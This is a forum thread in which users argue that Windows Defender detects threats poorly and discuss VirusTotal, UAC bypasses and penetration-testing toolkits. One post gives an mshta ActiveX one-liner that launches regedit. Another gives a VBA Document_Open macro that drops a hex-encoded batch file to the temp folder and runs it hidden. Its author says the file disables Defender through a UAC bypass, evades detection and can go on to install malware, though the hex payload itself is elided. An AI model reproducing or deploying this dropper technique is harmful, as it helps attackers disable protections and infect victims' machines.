Windows Defender - The worst AV ever?

Discussion in 'Windows 10' started by Windows_Addict, Feb 7, 2020.

  1. chaython

    chaython MDL Novice

    Oct 2, 2011
    4
    1
    0
    If virus total doesn't detect the threat then what's anything to do to protect you? If it's already on the system and is executing without detection it could kill pretty much whatever it wants.
    For another av the virus could take ownership and force delete .sys files for the existing antivirus making windows bsod on reboot.
    If it's spyware and you have a firewall it could still loopback through firefox...
     
  2. BAU

    BAU MDL Addicted

    Feb 10, 2009
    558
    963
    30
    #102 BAU, Feb 15, 2020
    Last edited: Feb 15, 2020
    VirusTotal is a bit deceiving and should never be used as the sole trust factor, as most products featured don't actually trigger their heuristic/hips/sandboxing when being batch-run in vm's.
    0-day and such require hybrid analysis / sandboxing - there are several choices available online now (each with their pros and cons, rip anubis).
    Anyway, that's beside the point.
    It's not considered a threat because it is not a threat. You can't expect others being more catholic than the pope.
    "UAC is not a security boundary" -Microsoft
    But actually proper AVs installed on real machines have heuristics engines that if not blocking, at least will alert you before executing cmd from notepad from example.
    And you can't "pull the rug" from other AVs so easily - almost all of them have quite powerful defenses via kernel drivers, and not just one, but multiple redundancies.
    It takes having access to an exploitable signed driver to even begin attacking them.

    What's actually hilarious - or very sad - depending from which point you are looking, is that Defender immediately goes mad when executing stuff like this:
    Code:
    mshta "javascript:window.close(new ActiveXObject('WScript.Shell').Run('regedit.exe -m', 1, 'False'))"
    Yet it's completely fine with stuff we've showcased in this thread..
     
  3. Windows_Addict

    Windows_Addict MDL Senior Member

    Jul 19, 2018
    407
    615
    10
    Relying on virus total results is a bad idea, it does not include real-time execution detection and behavioral detection, it only scans a file in a most basic way.
    A virus can be encrypted and hidden in a file, the virus total will flag it 100% clean, but the antivirus real-time protection will immediately block this threat when this software will try to extract and execute the malicious lines.

    For example, today I tested Kaspersky free against the methods to bypass WD and UAC posted in page number 5 in this thread, it blocked the UAC bypass methods instantly, it doesn't mean that it'll surely protect against every UAC bypass but apparently they have a database for such bypasses and they detect it.

    WD should have blocked the UAC bypasses and for the love of god at least .chm help file method but they don't care, others AV do, that's the whole point of this thread.

    edit - just saw that BAU posted above too.
     
  4. BAU

    BAU MDL Addicted

    Feb 10, 2009
    558
    963
    30
    More troublesome is that there are dozens of so-called "penetration testing" toolkits available to automate multiple methods until succeeded - most dll-injection/msi/cmstplua/ctf/wnf ones work just fine and not even kaspersky will cover all of them.. and why should they? why should a 3rd party fix what microsoft themselves don't "elevate" (pun-intended) as being an issue?
    Nobody even bothers reporting UAC bypasses anymore, and stuff only ever gets fixed when tangentially hit by a larger issue
     
  5. nosirrahx

    nosirrahx MDL Senior Member

    Nov 7, 2017
    371
    190
    10
    Not only is this true, but it becomes more true every year. It is impossible to replicate a real bare metal system and the actual attack vector used at the point of infection for the torrent of samples coming into VT so the results should be thought of a piece of the total picture, not a conclusive answer.
     
  6. Krakatoa

    Krakatoa MDL Addicted

    Feb 22, 2011
    500
    740
    30
    example doc macro
    Code:
    Private Sub Document_Open()
        Dim i As Long
        Dim nFileNum As Integer
        Dim sFilename As String
        Dim strBytes As String
        Dim arrBytes As Variant
        sFilename = Environ("Temp") & "\d.cmd"
        strBytes = "00 00 00 ... 00 00 00"
        strBytes = strBytes & " 00 00 00 ... 00 00 00"
        arrBytes = Split(strBytes)
        nFileNum = FreeFile
        Open sFilename For Binary Lock Read Write As #nFileNum
        For i = LBound(arrBytes) To UBound(arrBytes)
            Put #nFileNum, , CByte("&H" & arrBytes(i))
        Next i
        Close #nFileNum
        Call Shell("cmd.exe /C ""%TMP%\d.cmd""", vbHide)
    End Sub
    In strBytes is d.cmd as hex.
    In d.cmd is disable defender (uac baypass included).
    Undetected.
    Functional under admin account.
    The script can continue by installing malware, the defender will already be disabled.
     
  7. BAU

    BAU MDL Addicted

    Feb 10, 2009
    558
    963
    30